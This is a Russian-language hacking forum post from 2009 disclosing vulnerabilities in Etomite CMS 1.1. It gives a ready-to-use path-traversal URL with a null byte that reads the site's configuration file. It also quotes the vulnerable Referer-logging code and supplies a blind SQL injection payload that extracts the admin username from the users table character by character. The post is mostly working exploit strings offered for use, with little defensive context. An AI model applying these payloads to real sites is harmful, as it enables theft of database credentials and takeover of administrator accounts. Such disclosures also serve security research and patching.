Показать сообщение отдельно

  #5  
Старый 23.05.2009, 08:49
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


По умолчанию

Etomite CMS Blind Sql injection, чтения локальных файлов
Производитель:http://www.etomite.org/
Продукт:Etomite CMS
Версия:1.1
Чтения локальных файлов(постом или при registr_globals on гетом и magic_quotes_gpc off):
PHP код:
http://www.hsc.org/manager/actions/static/document_data.static.action.php?id=../../../../../includes/config.inc.php%00 
Blind Sql injection
Иньекция в Referer, вернее в path(manager/includes/visitor_logging.inc.php(101)):
PHP код:
$referer urldecode($_SERVER['HTTP_REFERER']);
if(empty(
$referer)) {
  
$referer "Unknown";
} else {
  
$pieces parse_url($referer);
    
$referer $pieces['scheme']."://".$pieces['host'].$pieces['path'];
}

...........................

$sql "REPLACE INTO $tbl(id, data) VALUES('".$ref."', '".$referer."')";//206 
пример реферера для blind:
PHP код:
http://asdasdasdads.com/%27 or 1=IF(ASCII(SUBSTRING((SELECT username FROM etomite.etomite_manager_users where id = 1),1,1))>96,0,(select 1 union select 5)))--+ 
необходимо знать префикс и имя базы данных(без нее выпадаем в ошибку)
 
Ответить с цитированием